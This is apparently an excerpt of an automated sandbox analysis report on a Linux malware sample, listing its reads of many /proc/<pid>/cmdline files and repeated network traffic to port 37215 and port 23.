        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2302/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/3236/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2025/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2146/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/910/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/912/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/517/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/759/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2307/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/918/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1594/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2285/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2281/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/5150/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1349/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1623/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/761/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1622/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/884/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1983/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2038/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1344/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1465/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1586/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1860/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1463/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2156/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/800/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/801/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1629/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1627/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1900/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4470/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/3021/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/491/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2294/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2050/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/5160/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1877/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/772/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1633/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1599/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1632/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/774/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1477/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/654/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/896/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1476/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1872/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2048/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/655/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1475/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2289/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/656/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/777/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/657/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/658/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4467/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4500/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/5039/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4468/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4469/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/419/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/936/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1639/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1638/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2208/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2180/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1809/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1494/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1890/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2063/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2062/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1888/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1886/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/420/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1489/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/785/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1642/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/788/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/667/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/789/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1648/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4491/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/5184/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/4495/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2078/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2077/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2074/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2195/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/670/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/5183/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2746/cmdline

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 47304 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43030 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43230 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 60934 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59870 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 39286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49462
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49486
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 38064 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49512
        Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 38064
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49546
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49656
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49692
        Source: unknownNetwork traffic detected: HTTP traffic on port 58230 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49900
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50078
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50122
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50158
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50198
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50236
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50324
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50390
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50424
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50466
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50482
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50488
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50492
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50514
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50550
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50574
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 55786 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 42804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54540 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 36252 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 55786 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 42804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53344 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56498 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 55786 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 42804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 52144 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43664 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43664 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44510 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43664 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 38684 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43664 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 55786 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 42804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35928 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43134 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43664 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43134 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43134 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48170 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43134 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59556
        Source: unknownNetwork traffic detected: HTTP traffic on port 48170 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59598
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59622
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59642
        Source: unknownNetwork traffic detected: HTTP traffic on port 43134 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59662
        Source: unknownNetwork traffic detected: HTTP traffic on port 33120 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59682
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59706
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59728
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59778
        Source: unknownNetwork traffic detected: HTTP traffic on port 58352 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59810
        Source: unknownNetwork traffic detected: HTTP traffic on port 43664 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59836
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59858
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59876
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59896
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59922
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59976
        Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60000
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60020
        Source: unknownNetwork traffic detected: HTTP traffic on port 41418 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60042
        Source: unknownNetwork traffic detected: HTTP traffic on port 48170 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60064
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60086
        Source: unknownNetwork traffic detected: HTTP traffic on port 58352 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60112
